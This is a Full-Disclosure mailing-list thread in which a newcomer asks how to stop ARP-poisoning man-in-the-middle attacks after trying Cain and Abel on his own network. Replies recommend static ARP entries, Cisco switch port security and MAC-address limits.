http://infiltrated.net/cisco/vlan-insecurities.html
http://infiltrated.net/cisco/vlan-tagging-101.html
http://infiltrated.net/cisco/vla-tagging.pdf

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x0D99C05C
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0D99C05C

sil @ infiltrated . net http://www.infiltrated.net

"How a man plays the game shows something of his
character - how he loses shows all" - Mr. Luckey
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: Cain and Abel

[Paul Melson]

Under a default or "dumb" switched environment, both the switch and the
victim hosts will digest the phony ARP broadcasts sent by tools like Cain or
Ettercap.  Static ARP entries on a server should be enough to prevent
session hijacking, but in order to stop eavesdropping, both victims need
static ARP entries.  Of course, if you're finding that your static ARP
entries are being overwritten by the phony broadcasts, that's something your
vendor needs to know about.

A more manageable defense against ARP poisoning attacks is to configure your
switches to prevent against MAC address spoofing.  Cisco switches, for
example, can statically map the MAC address of the interface connected to a
given port (good for servers), as well as limit the number of MAC addresses
that can appear on a given port (good for workstations, conference rooms,
hotel rooms, etc.).  More info specific to Cisco switches here:

http://www.cisco.com/en/US/products/hw/switches/ps4324/products_configuratio
n_guide_chapter09186a0080379add.html

PaulM

PS - You may find that certain clustering/HA products will use multiple MAC
addresses and thus give you headaches in conjunction with Cisco port
security configurations.

____

Subject: [Full-Disclosure] Re: Cain and Abel

Hi, I have been reading this list for some time now. Haven't contributed
much because I am still learning but recently stumbled into a security issue
that bothered me. A friend of mine showed me Cain and Abel, after giving it
a few runs on my network the results were scary. I have been trying to find
a decent solution on how to prevent the main in the middle attack with it
however I wasn't able to come up with a good working solution. I have tried
to set up static arp mappings on my system however the new ones overwrote
the old ones. Also I am not sure but does it also screw with switch's arp
tables or just the client ones? Any feedback would be nice


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Cain and Abel

[Honza Vlach]

Install OS that knows that static means really static (e.g. != Windows )

Have fun,
Honza Vlach

-- 
-BEGIN GEEK CODE BLOCK-
Version: 3.12
GIT/CS d- s: a-- C$ ULS$ P L+++ E--- W- N+ o? K? w-->--- O? M->+ V? PS 
PE Y++ PGP+++ !t 5? X++ R tv-- b++ DI+ D++ G+>+++ e h--- r++ y?
--END GEEK CODE BLOCK--
()  ascii ribbon campaign - against html mail 
/\- against microsoft attachments



pgpyOe9AAGBVP.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Cain and Abel

[Nick Vasiliev]

Hi, I have been reading this list for some time now. Haven't contributed much because I am still learning but recently stumbled into a security issue that bothered me. A friend of mine showed me Cain and Abel, after giving it a few runs on my network the results were scary. I have been trying to find a decent solution on how to prevent the main in the middle attack with it however I wasn't able to come up with a good working solution. I have tried to set up static arp mappings on my system however the new ones overwrote the old ones. Also I am not sure but does it also screw with switch's arp tables or just the client ones? Any feedback would be nice___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html